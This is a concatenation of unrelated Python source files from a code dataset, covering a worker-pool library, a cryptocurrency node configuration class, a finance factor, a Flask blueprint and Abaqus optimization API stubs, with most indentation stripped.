norms.append(score.squeeze(-1))
labels.append(label.cpu().numpy())
pbar.update()
pbar.close()
norms = np.concatenate(norms)
labels = np.concatenate(labels).astype(int)
dataset = get_datasets(config.dataset.name, train=False)
N = 6
all_low, all_high = [], []
for label in [0, 3, 4, 5, 7, 8]:
norms_l = norms[labels == label]
order_l = np.argsort(norms_l)
indices_l = np.where(labels == label)[0]
indices_l = indices_l[order_l]
low = indices_l[:N]
high = indices_l[-N:]
low_images = []
low_labels = []
for index in low:
_, image, label = dataset.__getitem__(index)
low_images.append(image)
low_labels.append(label)
all_low.extend(low_images)
high_images = []
high_labels = []
for index in high:
_, image, label = dataset.__getitem__(index)
high_images.append(image)
high_labels.append(label)
all_high.extend(high_images)
all_low = make_grid(all_low, nrow=N)
all_high = make_grid(all_high, nrow=N)
return all_low, all_high
def get_datasets(name, train=True):
image_transforms = transforms.Compose([
transforms.Resize(IMAGE_SHAPE[name]),
transforms.CenterCrop(CROP_SHAPE[name]),
transforms.ToTensor(),
])
root = DICT_ROOT[name]
if name == 'cifar10':
dataset = CIFAR10(root, train=train, image_transforms=image_transforms)
elif name == 'cifar100':
dataset = CIFAR100(root, train=train, image_transforms=image_transforms)
elif name == 'stl10':
        from src.datasets.stl10 import STL10  # assumed module path, mirroring the other src.datasets imports
        dataset = STL10(root, train=train, image_transforms=image_transforms)
elif name == 'tinyimagenet' or name == 'imagenet':
dataset = ImageNet(root, train=train, image_transforms=image_transforms)
else:
raise Exception(f'Dataset {name} not supported.')
return dataset
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('exp_dir', type=str, default='experiment directory')
parser.add_argument('checkpoint_name', type=str, help='checkpoint name')
parser.add_argument('--dataset', type=str, default=None)
parser.add_argument('--gpu-device', type=int, default=-1)
args = parser.parse_args()
out_dir = os.path.join(args.exp_dir, 'viz')
if not os.path.isdir(out_dir):
os.makedirs(out_dir)
grid_low, grid_high = viz(
args.exp_dir,
checkpoint_name=args.checkpoint_name,
dataset=args.dataset,
gpu_device=args.gpu_device)
save_image(grid_low, os.path.join(out_dir, 'low_score.png'))
save_image(grid_high, os.path.join(out_dir, 'high_score.png'))
| StarcoderdataPython |
54763 | <reponame>comps/pexen
import sys
from collections import namedtuple
import threading
import queue
import multiprocessing
import multiprocessing.queues # for picklability check
import pickle
from . import common, meta
class PoolError(common.SchedulerError):
"""Raised by ProcessWorkerPool or ThreadWorkerPool."""
pass
def _is_picklable(obj):
try:
pickle.dumps(obj)
return True
except (TypeError, AttributeError):
return False
# used internally by WorkerPool classes
_PoolWorkerMsg = namedtuple('_PoolWorkerMsg', ['workid', 'type', 'taskidx',
'shared', 'ret', 'excinfo'])
# TODO: use Python 3.7 namedtuple defaults
_PoolWorkerMsg.__new__.__defaults__ = (None,) * len(_PoolWorkerMsg._fields)
# TODO: also document that by delaying iteration of iter_results, the user
# can effectively throttle the execution as no new items will be scheduled
# until the user gives us back control
class ProcessWorkerPool:
_Queue = multiprocessing.Queue
_Worker = multiprocessing.Process
def __init__(self, workers=1, spare=1):
self.wanted_workers = workers
self.wanted_spare = spare
self.unfinished_workers = 0
self.taskq = self._Queue()
self.resultq = self._Queue()
self.active_tasks = 0
self.shutting_down = False
self.workers = []
# this serves two purposes:
# - it lets us pass a picklable integer into the worker instead of
# a potentially unpicklable callable
# - it lets the worker return a picklable integer, which we then
# transform back to the callable before returning it to the user
self.taskmap = {}
def _worker_body(self, workid, outqueue, inqueue):
while True:
taskinfo = inqueue.get()
if taskinfo is None:
msg = _PoolWorkerMsg(workid, 'finished')
outqueue.put(msg)
break
try:
taskidx, shared = taskinfo
task = self.taskmap[taskidx]
kwargs = meta.get_kwargs(task)
ret = None
# support special case: argument-less task, for simplicity
if task.__code__.co_argcount == 0:
ret = task(**kwargs)
else:
ret = task(shared, **kwargs)
if isinstance(outqueue, multiprocessing.queues.Queue):
if not _is_picklable(ret):
raise AttributeError("Can't pickle callable return value")
if not _is_picklable(shared):
raise AttributeError("Can't pickle callable shared state")
msg = _PoolWorkerMsg(workid, 'taskdone', taskidx, shared, ret)
outqueue.put(msg)
except Exception:
extype, exval, extb = sys.exc_info()
# multiprocessing.Queue prints a TypeError if an object is not
# picklable, but doesn't actually raise an exception, so we need
# to check picklability manually
if isinstance(outqueue, multiprocessing.queues.Queue):
if not _is_picklable(ret):
ret = None
if not _is_picklable(shared):
shared = None
if not _is_picklable(exval):
exval = None
if not _is_picklable(extb):
extb = None
msg = _PoolWorkerMsg(workid, 'taskdone', taskidx, shared, ret,
common.ExceptionInfo(extype, exval, extb))
outqueue.put(msg)
# in case the above ever gets fixed:
#try:
# outqueue.put((taskidx, None, (extype, exval, extb)))
#except TypeError:
# try:
# outqueue.put((taskidx, None, (extype, exval, None)))
# except TypeError:
# outqueue.put((taskidx, None, (extype, None, None)))
def start(self):
if self.unfinished_workers > 0:
raise PoolError("Cannot re-start a running pool")
self.workers = []
for workid in range(self.wanted_workers):
w = self._Worker(target=self._worker_body,
args=(workid, self.resultq, self.taskq))
w.start()
self.workers.append(w)
self.unfinished_workers = self.wanted_workers
self.max_tasks = self.wanted_workers + self.wanted_spare
self.shutting_down = False
def full(self):
return self.active_tasks >= self.max_tasks
def empty(self):
return self.active_tasks <= 0
def idlecnt(self):
return self.max_tasks - self.active_tasks
# self.unfinished_workers represent how many workers owe us
# msg.type==finished so that we know whether we should wait for more task
# results to come from the queue in self.iter_results() or return to user
# - this will be 0 if the user exhausted all iter_results()
# - but it will be non-0 if the user just called shutdown(wait=True)
#
# self.alive represents how many actual OS threads or processes are running
# so we know when it's safe to modify the shared non-fork()ed state
# - this will be 0 regardless of whether the user called iter_results()
# - it will be 0 after shutdown(wait=True) returns
# - it may be non-0 right after shutdown(wait=False), but it will itself
# eventually become 0 as the workers exit when finished
def alive(self):
return any((x.is_alive() for x in self.workers))
def register(self, tasks):
if self.alive():
raise PoolError("Cannot register tasks while the pool is running")
for task in tasks:
self.taskmap[id(task)] = task
# mp: just check + raise if not present
# thr: just update, don't check
def _check_update_taskmap(self, task):
if id(task) not in self.taskmap:
raise PoolError(f"Cannot submit unregistered task {task}")
def submit(self, task, shared={}):
if self.shutting_down:
raise PoolError("The pool is shutting down")
if not self.alive():
raise PoolError("The pool is not running")
self._check_update_taskmap(task)
self.taskq.put((id(task), shared))
self.active_tasks += 1
def shutdown(self, wait=False):
if self.shutting_down:
raise PoolError("The pool is already shutting down")
self.shutting_down = True
for _ in range(len(self.workers)):
self.taskq.put(None)
if wait:
for w in self.workers:
w.join()
# iter_results over queued results still valid after this
def iter_results(self):
while self.unfinished_workers > 0 or self.active_tasks > 0:
msg = self.resultq.get()
if msg.type == 'finished':
self.workers[msg.workid].join()
self.unfinished_workers -= 1
elif msg.type == 'taskdone':
task = self.taskmap[msg.taskidx]
self.active_tasks -= 1
yield common.TaskRes(task, msg.shared, msg.ret, msg.excinfo)
else:
raise RuntimeError(f"unexpected msg: {msg}")
class ThreadWorkerPool(ProcessWorkerPool):
_Queue = queue.Queue
_Worker = threading.Thread
def register(self, tasks):
pass
def _check_update_taskmap(self, task):
self.taskmap[id(task)] = task
| StarcoderdataPython |
1619218 | import binascii
import hashlib
import json
from logging import getLogger
from time import time
import base58
from bip32utils import BIP32Key
from bitcoin.wallet import P2PKHBitcoinAddress
from coincurve import PrivateKey, PublicKey
from mnemonic import Mnemonic
CONFIG = None
def get_config():
return CONFIG
class Config(object):
def __init__(self, config):
self.start_time = int(time())
self.seed = config.get('seed', '')
self.xprv = config.get('xprv', '')
self.username = config.get('username', '')
self.network = config.get('network', 'mainnet')
self.use_pnp = config.get('use_pnp', True)
self.ssl = config.get('ssl', False)
self.origin = config.get('origin', False)
self.max_inbound = config.get('max_inbound', 10)
self.max_outbound = config.get('max_outbound', 10)
self.max_miners = config.get('max_miners', -1)
self.polling = config.get('polling', 30)
if 0 < self.polling < 30:
getLogger("tornado.application").error("Using too small a polling value ({}), use 0 or > 30"
.format(self.polling))
self.public_key = config['public_key']
self.address = str(P2PKHBitcoinAddress.from_pubkey(bytes.fromhex(self.public_key)))
self.private_key = config['private_key']
self.wif = self.to_wif(self.private_key)
self.bulletin_secret = self.get_bulletin_secret()
self.mongodb_host = config['mongodb_host']
self.database = config['database']
self.site_database = config['site_database']
self.web_server_host = config['web_server_host']
self.web_server_port = config['web_server_port']
if config['peer_host'] == '0.0.0.0' or config['peer_host'] == 'localhost':
raise Exception("Cannot use localhost or 0.0.0.0, must specify public ipv4 address")
if config['peer_host'] == '[my public ip]':
raise Exception("Please configure your peer_post to your public ipv4 address")
self.peer_host = config['peer_host']
self.peer_port = config['peer_port']
self.serve_host = config['serve_host']
self.serve_port = config['serve_port']
self.public_ip = config.get('public_ip', self.serve_host)
self.callbackurl = config['callbackurl']
self.fcm_key = config['fcm_key']
self.post_peer = config.get('post_peer', True)
self.extended_status = config.get('extended_status', False)
        self.peers_seed = config.get('peers_seed', []) # not used, superseded by config/seed.json
self.force_broadcast_to = config.get('force_broadcast_to', [])
self.force_polling = config.get('force_polling', [])
self.outgoing_blacklist = config.get('outgoing_blacklist', [])
# Do not try to test or connect to ourselves.
self.outgoing_blacklist.append(self.serve_host)
self.outgoing_blacklist.append(self.public_ip)
self.protocol_version = 1
# Config also serves as backbone storage for all singleton helpers used by the components.
self.mongo = None
self.consensus = None
self.peers = None
self.BU = None
self.GU = None
self.SIO = None
self.debug = False
self.mp = None
async def on_new_block(self, block):
"""Dispatcher for the new bloc event
This is called with a block object when we insert a new one in the chain."""
# Update BU
# We can either invalidate, or directly set the block as cached one.
# self.BU.invalidate_last_block()
block_dict = block.to_dict()
self.BU.set_latest_block(block_dict) # Warning, this is a dict, not a Block!
def debug_log(self, string: str):
# Helper to write temp string to a debug file
with open("debug.trace", "a") as fp:
fp.write(str(int(time())) + ' - ' + string + "\n")
def get_status(self):
pool_status = 'N/A'
if self.mp:
pool_status = self.mp.get_status()
status = {'version': self.protocol_version, 'network': self.network,
# 'connections':{'outgoing': -1, 'ingoing': -1, 'max': -1},
'peers': self.peers.get_status(),
'pool': pool_status, 'height': self.BU.get_latest_block()['index'],
'uptime': int(time() - self.start_time)}
# TODO: add uptime in human readable format
return status
@classmethod
def generate(cls, xprv=None, prv=None, seed=None, child=None, username=None):
mnemonic = Mnemonic('english')
        # generate a 24-word mnemonic seed (256 bits of entropy)
if not seed and not xprv and not prv:
seed = mnemonic.generate(256)
private_key = None
if seed:
# create bitcoin wallet
entropy = mnemonic.to_entropy(seed)
key = BIP32Key.fromEntropy(entropy)
private_key = key.PrivateKey().hex()
extended_key = key.ExtendedKey()
else:
raise Exception('No Seed')
if prv:
private_key = PrivateKey.from_hex(bytes.fromhex(prv)).to_hex()
extended_key = ''
if xprv:
key = BIP32Key.fromExtendedKey(xprv)
private_key = key.PrivateKey().hex()
extended_key = key.ExtendedKey()
if xprv and child:
for x in child:
key = key.ChildKey(int(x))
private_key = key.PrivateKey().hex()
if not private_key:
raise Exception('No key')
return cls({
"seed": seed or '',
"xprv": extended_key or '',
"private_key": private_key,
"wif": cls.generate_wif(private_key),
"public_key": PublicKey.from_point(key.K.pubkey.point.x(), key.K.pubkey.point.y()).format().hex(),
"address": str(key.Address()),
"serve_host": "0.0.0.0",
"serve_port": 8000,
"use_pnp": True,
"ssl": False,
"origin": '',
"polling": 0,
"post_peer": False,
# "public_ip": "", # TODO
"peer_host": "",
"peer_port": 8000,
"web_server_host": "0.0.0.0",
"web_server_port": 5000,
"peer": "http://localhost:8000",
"callbackurl": "http://0.0.0.0:5000/create-relationship",
"fcm_key": "",
"database": "yadacoin",
"site_database": "yadacoinsite",
"mongodb_host": "localhost",
"mixpanel": "",
"username": username or '',
"network": "mainnet"
})
@classmethod
def from_dict(cls, config):
from yadacoin.transactionutils import TU
cls.seed = config.get('seed', '')
cls.xprv = config.get('xprv', '')
cls.username = config.get('username', '')
cls.use_pnp = config.get('use_pnp', True)
cls.ssl = config.get('ssl', True)
cls.origin = config.get('origin', True)
cls.polling = config.get('polling', -1)
cls.network = config.get('network', 'mainnet')
cls.public_key = config['public_key']
cls.address = str(P2PKHBitcoinAddress.from_pubkey(bytes.fromhex(cls.public_key)))
cls.private_key = config['private_key']
cls.wif = cls.generate_wif(cls.private_key)
cls.bulletin_secret = TU.generate_deterministic_signature(config, config['username'], config['private_key'])
cls.mongodb_host = config['mongodb_host']
cls.database = config['database']
cls.site_database = config['site_database']
cls.web_server_host = config['web_server_host']
cls.web_server_port = config['web_server_port']
if config['peer_host'] == '0.0.0.0' or config['peer_host'] == 'localhost':
raise Exception("cannot use localhost or 0.0.0.0, must specify public ipv4 address")
if config['peer_host'] == '[my public ip]':
raise Exception("please configure your peer_post to your public ipv4 address")
cls.peer_host = config['peer_host']
cls.peer_port = config['peer_port']
cls.serve_host = config['serve_host']
cls.serve_port = config['serve_port']
cls.callbackurl = config['callbackurl']
cls.fcm_key = config['fcm_key']
def get_bulletin_secret(self):
from yadacoin.transactionutils import TU
return TU.generate_deterministic_signature(self, self.username, self.private_key)
def to_wif(self, private_key):
private_key_static = private_key
extended_key = "80"+private_key_static+"01"
first_sha256 = hashlib.sha256(binascii.unhexlify(extended_key)).hexdigest()
second_sha256 = hashlib.sha256(binascii.unhexlify(first_sha256)).hexdigest()
final_key = extended_key+second_sha256[:8]
wif = base58.b58encode(binascii.unhexlify(final_key)).decode('utf-8')
return wif
@classmethod
def generate_wif(cls, private_key):
private_key_static = private_key
extended_key = "80"+private_key_static+"01"
first_sha256 = hashlib.sha256(binascii.unhexlify(extended_key)).hexdigest()
second_sha256 = hashlib.sha256(binascii.unhexlify(first_sha256)).hexdigest()
final_key = extended_key+second_sha256[:8]
wif = base58.b58encode(binascii.unhexlify(final_key)).decode('utf-8')
return wif
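
    # Note on the WIF encoding used by to_wif / generate_wif above: the "80" prefix marks a
    # mainnet private key, the trailing "01" flags a compressed public key, and the first
    # 4 bytes (8 hex chars) of the double SHA-256 act as the checksum before Base58 encoding.
    # Hypothetical usage: wif = Config.generate_wif('<64-hex-char private key>')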
def to_dict(self):
return {
'seed': self.seed,
'xprv': self.xprv,
'public_key': self.public_key,
'address': self.address,
'private_key': self.private_key,
'wif': self.wif,
'bulletin_secret': self.bulletin_secret,
'mongodb_host': self.mongodb_host,
'username': self.username,
'network': self.network,
'database': self.database,
'site_database': self.site_database,
'web_server_host': self.web_server_host,
'web_server_port': self.web_server_port,
'peer_host': self.peer_host,
'peer_port': self.peer_port,
'serve_host': self.serve_host,
'serve_port': self.serve_port,
'use_pnp': self.use_pnp,
'ssl': self.ssl,
'origin': self.origin,
'fcm_key': self.fcm_key,
'polling': self.polling,
'callbackurl': self.callbackurl
}
def to_json(self):
return json.dumps(self.to_dict(), indent=4)
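
# Usage sketch (hypothetical values; requires the rest of the yadacoin package, e.g. TU):
#     config = Config.generate(username='node-1')   # fresh seed, keys and WIF
#     print(config.to_json())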
| StarcoderdataPython |
1767654 | from flask import Blueprint
admin = Blueprint('admin', __name__, template_folder='templates')
from app.admin import routes | StarcoderdataPython |
3342651 | <reponame>ChineseSuperman/zvt
# -*- coding: utf-8 -*-
from typing import List, Union
import pandas as pd
from zvdata.factor import ScoreFactor
from zvdata.structs import IntervalLevel
from zvt.domain import FinanceFactor
class FinanceGrowthFactor(ScoreFactor):
def __init__(self,
entity_ids: List[str] = None,
entity_type: str = 'stock',
exchanges: List[str] = ['sh', 'sz'],
codes: List[str] = None,
the_timestamp: Union[str, pd.Timestamp] = None,
start_timestamp: Union[str, pd.Timestamp] = None,
end_timestamp: Union[str, pd.Timestamp] = None,
columns: List = [FinanceFactor.op_income_growth_yoy, FinanceFactor.net_profit_growth_yoy,
FinanceFactor.rota,
FinanceFactor.roe],
filters: List = None,
order: object = None,
limit: int = None,
provider: str = 'eastmoney',
level: Union[str, IntervalLevel] = IntervalLevel.LEVEL_1DAY,
category_field: str = 'entity_id',
time_field: str = 'report_date',
trip_timestamp: bool = True,
auto_load: bool = True,
keep_all_timestamp: bool = False,
fill_method: str = 'ffill',
effective_number: int = 10,
depth_computing_method='ma',
depth_computing_param={'window': '100D', 'on': 'report_date'},
breadth_computing_method='quantile',
breadth_computing_param={'score_levels': [0.1, 0.3, 0.5, 0.7, 0.9]}) -> None:
super().__init__(FinanceFactor, entity_ids, entity_type, exchanges, codes, the_timestamp, start_timestamp,
end_timestamp, columns, filters, order, limit, provider, level,
category_field, time_field, trip_timestamp, auto_load, keep_all_timestamp, fill_method,
effective_number, depth_computing_method, depth_computing_param, breadth_computing_method,
breadth_computing_param)
if __name__ == '__main__':
factor = FinanceGrowthFactor(start_timestamp='2018-01-01',
end_timestamp='2018-12-31',
codes=['000338', '000778', '601318'],
auto_load=True)
factor.draw_result(chart='bar')
| StarcoderdataPython |
1644529 | import typing
from abaqusConstants import *
from .BeadTask import BeadTask
from .ShapeTask import ShapeTask
from .SizingTask import SizingTask
from .TopologyTask import TopologyTask
from ..Model.ModelBase import ModelBase
class OptimizationTaskModel(ModelBase):
"""Abaqus creates a Model object named `Model-1` when a session is started.
Notes
-----
This object can be accessed by:
.. code-block:: python
mdb.models[name]
"""
def BeadTask(self, name: str, abaqusSensitivities: Boolean = True,
algorithm: SymbolicConstant = GENERAL_OPTIMIZATION, areBCRegionsFrozen: Boolean = OFF,
beadIter: str = 1, beadMaxMembraneStress: str = 0, beadMinStress: str = 0,
beadPerturbation: str = 0, beadWidth: SymbolicConstant = DEFAULT, curveSmooth: str = 5,
filterRadius: str = 4, filterRadiusBy: SymbolicConstant = VALUE,
flipNormalDir: Boolean = OFF, frozenBoundaryConditionRegion: SymbolicConstant = MODEL,
isSensCalcOnlyOnDesignNodes: Boolean = OFF,
modeTrackingRegion: SymbolicConstant = MODEL, nodalMoveLimit: float = 0,
nodeSmooth: SymbolicConstant = DEFAULT,
nodeUpdateStrategy: SymbolicConstant = CONSERVATIVE, numTrackedModes: int = 5,
updateShapeBasisVectors: SymbolicConstant = EVERY_CYCLE, groupOperator: Boolean = OFF) -> BeadTask:
"""This method creates a BeadTask object.
Notes
-----
This function can be accessed by:
.. code-block:: python
mdb.models[name].BeadTask
Parameters
----------
name
A String specifying the optimization task repository key.
abaqusSensitivities
A Boolean specifying whether to use Abaqus to compute the design responses and their
sensitivities. The default value is True.
algorithm
A SymbolicConstant specifying the optimization task algorithm. Possible values are
GENERAL_OPTIMIZATION and CONDITION_BASED_OPTIMIZATION. The default value is
GENERAL_OPTIMIZATION.
areBCRegionsFrozen
A Boolean specifying whether to exclude elements with boundary conditions from the
optimization. The default value is OFF.
beadIter
An int specifying the step size of the optimization. The default value is 1.
beadMaxMembraneStress
A float specifying maximum membrane/bending stress. The default value is 0.1.
beadMinStress
A float specifying minimum stress. The default value is 0.001.
beadPerturbation
            A Float specifying the perturbation size for finite differences. The default value is 0.0001.
beadWidth
A SymbolicConstant specifying the Optimization product default or a float specifying the
bead width. The default value is DEFAULT.
curveSmooth
A float specifying relative value to the middle element edge length such that normals in
this area do not cross each other. The default value is 5.
filterRadius
A float specifying the filter radius. The default value is 4.
filterRadiusBy
A SymbolicConstant specifying the method used to define filter radius. Possible values
are VALUE and REFERENCE. The default is VALUE.
flipNormalDir
A Boolean specifying whether the growth direction is along the normal direction of
elements or opposite to the normal direction. The default value is OFF
frozenBoundaryConditionRegion
When nodes with boundary conditions are excluded from the optimization
(*frozenBoundaryConditionRegions* = ON). you can specify that this exclusion apply to
nodes throughout the model or only to those nodes from a specific region. Set this
parameter to the SymbolicConstant MODEL to apply the freeze to the entire model, or set
this parameter to a Region object to specify an individual region over which nodes with
boundary conditions should be frozen. The default value is MODEL.
isSensCalcOnlyOnDesignNodes
A Boolean specifying whether to calculate the sensitivities only on design nodes or the
whole model. The default value is ON
modeTrackingRegion
The SymbolicConstant MODEL or a Region object specifying the region to use for mode
tracking. The default value is MODEL.
nodalMoveLimit
A Float specifying the maximum change in nodal displacement per design cycle. The
default value is 0.1.
nodeSmooth
A SymbolicConstant specifying the Optimization product default or a float specifying the
node smooth. The default value is DEFAULT.
nodeUpdateStrategy
A SymbolicConstant specifying the strategy for how the nodal displacements are updated
in the method of moving asymptotes. Possible values are NORMAL, CONSERVATIVE, and
AGGRESSIVE. The default value is CONSERVATIVE.
numTrackedModes
An Int specifying the number of modes included in mode tracking. The default value is 5.
updateShapeBasisVectors
A SymbolicConstant specifying whether to update shape basis vectors in the first design
cycle or every design cycle. Possible values are EVERY_CYCLE and FIRST_CYCLE. The
default value is EVERY_CYCLE.
groupOperator
A Boolean specifying whether the group in the design response will be evaluated using
the existing algorithm or a new algorithm based on Abaqus sensitivities. The default
value of False means that the existing algorithm will be used.
Returns
-------
A BeadTask object.
"""
self.optimizationTasks[name] = optimizationTask = BeadTask(name, abaqusSensitivities, algorithm,
areBCRegionsFrozen, beadIter, beadMaxMembraneStress,
beadMinStress, beadPerturbation, beadWidth,
curveSmooth, filterRadius, filterRadiusBy,
flipNormalDir, frozenBoundaryConditionRegion,
isSensCalcOnlyOnDesignNodes, modeTrackingRegion,
nodalMoveLimit, nodeSmooth, nodeUpdateStrategy,
numTrackedModes, updateShapeBasisVectors,
groupOperator)
return optimizationTask
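
    # Hypothetical usage, following the access path given in the docstring:
    #     mdb.models['Model-1'].BeadTask(name='Bead-Task-1')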
def ShapeTask(self, name: str, abaqusSensitivities: Boolean = True,
absoluteStepSizeControl: SymbolicConstant = MINIMUM, activateDurability: Boolean = ON,
additionalDurabilityFiles: str = '',
algorithm: SymbolicConstant = CONDITION_BASED_OPTIMIZATION,
constrainedLaplacianConvergenceLevel: SymbolicConstant = NORMAL,
curvatureSmoothingEdgeLength: float = 5, durabilityInputfile: str = '',
durabilitySolver: str = FE_SAFE, equalityConstraintTolerance: float = None,
featureRecognitionAngle: float = 30, filterExponent: float = 1,
filterMaxRadius: float = None, filterRadiusReduction: float = None,
firstCycleDeletedVolumeTechnique: SymbolicConstant = OFF,
freezeBoundaryConditionRegions: Boolean = OFF,
frozenBoundaryConditionRegion: SymbolicConstant = MODEL,
geometricRestrictionEvaluationFrequency: SymbolicConstant = LOW,
growthScaleFactor: float = 1, haltUponViolation: Boolean = OFF,
layerReferenceRegion: str = None,
meshSmoothingRegionMethod: SymbolicConstant = TASK_REGION_LAYERS,
meshSmoothingStrategy: SymbolicConstant = CONSTRAINED_LAPLACIAN,
midsideInterpolation: SymbolicConstant = POSITIONS,
numFreeNodeLayers: SymbolicConstant = 0, numSmoothedElementLayers: int = None,
presumeFeasibleBCRegionAtStart: Boolean = ON, quadMaxAngle: float = 160,
quadMinAngle: float = 20, quadSkew: float = 30, quadTaper: float = 0,
region: SymbolicConstant = MODEL, reportPoorQualityElements: Boolean = OFF,
reportQualityViolation: Boolean = OFF, shrinkScaleFactor: float = 1,
smoothingRegion: str = None, targetMeshQuality: SymbolicConstant = LOW,
tetAspectRatio: float = 100, tetMaxAspect: float = 8, tetMinAspect: float = 0,
tetSkew: float = 100, triMaxAngle: float = 140, triMinAngle: float = 20,
updateShapeBasisVectors: SymbolicConstant = EVERY_CYCLE, groupOperator: Boolean = OFF) -> ShapeTask:
"""This method creates a ShapeTask object.
Notes
-----
This function can be accessed by:
.. code-block:: python
mdb.models[name].ShapeTask
Parameters
----------
name
A String specifying the optimization task repository key.
abaqusSensitivities
A Boolean specifying whether to use Abaqus to compute the design responses and their
sensitivities. The default value is True.
absoluteStepSizeControl
A SymbolicConstant specifying whether to control the permitted absolute step size by the
average optimization displacement or minimum optimization displacement. Possible values
are MINIMUM and AVERAGE. The default value is MINIMUM.
activateDurability
A boolean specifying whether or not the durability approach of optimization is turned
on. The default value is ON.
additionalDurabilityFiles
A String specifying the path of additional files pertaining to durability optimization.
Only valid if the *activateDurability* argument is ON.
algorithm
A SymbolicConstant specifying the optimization task algorithm. Possible values are
GENERAL_OPTIMIZATION and CONDITION_BASED_OPTIMIZATION. The default value is
CONDITION_BASED_OPTIMIZATION.
constrainedLaplacianConvergenceLevel
A SymbolicConstant specifying the constrained Laplacian convergence level. Possible
values are NORMAL, CONSERVATIVE, and AGGRESSIVE. The default value is NORMAL.
curvatureSmoothingEdgeLength
A Float specifying the edge length for the movement vector. The default value is 5.0.
durabilityInputfile
A string specifying the path of the input file. Only valid if the *activateDurability*
argument is ON and is a required argument in that case.
durabilitySolver
A String specifying the type of solver for durability optimization. Possible values are:
FE_SAFE, FEMFAT, FLANS, MSC_FATIGUE, FE_FATIGUE, DESIGN_LIFE, CUSTOM, FEMSITE. The
default value is FE_SAFE. Only valid if the *activateDurability* argument is ON.
equalityConstraintTolerance
            A Float specifying the equality constraint tolerance. The default value is 0.001.
featureRecognitionAngle
A Float specifying the mesh smoothing feature recognition angle for edges and corners.
The default value is 30.0.
filterExponent
A Float specifying the weight depending on the radius, used when *filterMaxRadius* is
specified. The default value is 1.0.
filterMaxRadius
None or a Float specifying the maximum influence radius for equivalent stress. The
default value is None.
filterRadiusReduction
None or a Float specifying the reduction of the radius depending on surface bending,
used when *filterMaxRadius* is specified. The default value is None.
firstCycleDeletedVolumeTechnique
A SymbolicConstant specifying the method of specifying volume that can be removed
immediately in the first design cycle. Possible values are OFF, PERCENTAGE, and
ABSOLUTE. The default value is OFF.
freezeBoundaryConditionRegions
A Boolean specifying whether to exclude nodes with boundary conditions from the
optimization. The default value is OFF.
frozenBoundaryConditionRegion
The SymbolicConstant MODEL or a Region object specifying the region in which to freeze
boundary condition regions, or the SymbolicConstant MODEL, used with
*freezeBoundaryConditionRegions*. The default value is MODEL.
geometricRestrictionEvaluationFrequency
A SymbolicConstant specifying the frequency of evaluating geometric restrictions during
mesh smoothing. Possible values are LOW, MEDIUM, and HIGH. The default value is LOW.
growthScaleFactor
A Float specifying the scale factor to apply to optimization displacements for nodes
with growth. The default value is 1.0.
haltUponViolation
A Boolean specifying whether to halt the optimization if quality criteria are not
            satisfied. The default value is OFF.
layerReferenceRegion
None or a Region object specifying the region specifying the first node layer for mesh
smoothing, used when *meshSmoothingRegionMethod* is TASK_REGION_LAYERS. The default
value is None.
meshSmoothingRegionMethod
A SymbolicConstant specifying the method used to determine the mesh smoothing region.
The REGION value uses the *smoothingRegion*. The NUMBER_OF_LAYERS value uses the
*layerReferenceRegion*. The TASK_REGION_LAYERS value will smooth six layers using the
task region. Possible values are TASK_REGION_LAYERS, REGION, and NUMBER_OF_LAYERS. The
default value is TASK_REGION_LAYERS.
meshSmoothingStrategy
A SymbolicConstant specifying the method smoothing strategy. Possible values are
CONSTRAINED_LAPLACIAN and LOCAL_GRADIENT. The default value is CONSTRAINED_LAPLACIAN.
midsideInterpolation
A SymbolicConstant specifying the approach used when treating midside node positions
during optimization. POSITIONS indicates midside node positions are interpolated
linearly by position. OPTIMIZATION_DISPLACEMENT indicates they are interpolated by
optimization displacement of corner nodes. Possible values are POSITIONS and
OPTIMIZATION_DISPLACEMENT. The default value is POSITIONS.
numFreeNodeLayers
The SymbolicConstant FIX_NONE or an Int specifying the number of node layers adjoining
the task region to remain free during mesh smoothing. A value of 0 indicates that no
layers are free and all layers are fixed. The default value is 0.
numSmoothedElementLayers
None or an Int specifying the number of layers for mesh smoothing when
*meshSmoothingRegionMethod* is NUMBER_OF_LAYERS. The default value is None.
presumeFeasibleBCRegionAtStart
A Boolean specifying whether to ignore automatically frozen boundary condition regions
in the first design cycle. This is used with *freezeBoundaryConditionRegions*. The
default value is ON.
quadMaxAngle
A Float specifying the maximum angle for quad elements during mesh smoothing. The
default value is 160.0.
quadMinAngle
A Float specifying the minimum angle for quad elements during mesh smoothing. The
default value is 20.0.
quadSkew
A Float specifying the skew angle for quad elements during mesh smoothing, used with
*reportQualityViolation*. The default value is 30.0.
quadTaper
A Float specifying the taper for quad elements during mesh smoothing, used with
*reportQualityViolation*. The default value is 0.5.
region
The SymbolicConstant MODEL or a Region object specifying the region to which the
optimization task is applied. The default value is MODEL.
reportPoorQualityElements
A Boolean specifying whether to report poor quality elements during mesh smoothing. The
default value is OFF.
reportQualityViolation
A Boolean specifying whether to report a quality criteria violation during mesh
smoothing. The default value is OFF.
shrinkScaleFactor
A Float specifying the scale factor to apply to optimization displacements for nodes
with shrinkage. The default value is 1.0.
smoothingRegion
None or a Region object specifying the mesh smoothing region, used when
*meshSmoothingRegionMethod* is REGION. The default value is None.
targetMeshQuality
A SymbolicConstant specifying the target mesh quality for mesh smoothing. Possible
values are NONE, LOW, MEDIUM, and HIGH. The default value is LOW.
tetAspectRatio
A Float specifying the tet element aspect ratio during mesh smoothing. The default value
is 100.0.
tetMaxAspect
A Float specifying the maximum tet element aspect ratio during mesh smoothing. The
default value is 8.0.
tetMinAspect
A Float specifying the minimum tet element aspect ratio during mesh smoothing. The
default value is 0.222.
tetSkew
A Float specifying the tet element skew value during mesh smoothing. The default value
is 100.0.
triMaxAngle
A Float specifying the tri element maximum angle during mesh smoothing. The default
value is 140.0.
triMinAngle
            A Float specifying the tri element minimum angle during mesh smoothing. The default
value is 20.0.
updateShapeBasisVectors
A SymbolicConstant specifying whether to update shape basis vectors in the first design
cycle or every design cycle. Possible values are EVERY_CYCLE and FIRST_CYCLE. The
default value is EVERY_CYCLE.
groupOperator
A Boolean specifying whether the group in the design response will be evaluated using
the existing algorithm or a new algorithm based on Abaqus sensitivities. The default
value of False means that the existing algorithm will be used.
Returns
-------
A ShapeTask object.
"""
self.optimizationTasks[name] = optimizationTask = ShapeTask(name, abaqusSensitivities, absoluteStepSizeControl,
activateDurability, additionalDurabilityFiles,
algorithm, constrainedLaplacianConvergenceLevel,
curvatureSmoothingEdgeLength, durabilityInputfile,
durabilitySolver, equalityConstraintTolerance,
featureRecognitionAngle, filterExponent,
filterMaxRadius, filterRadiusReduction,
firstCycleDeletedVolumeTechnique,
freezeBoundaryConditionRegions,
frozenBoundaryConditionRegion,
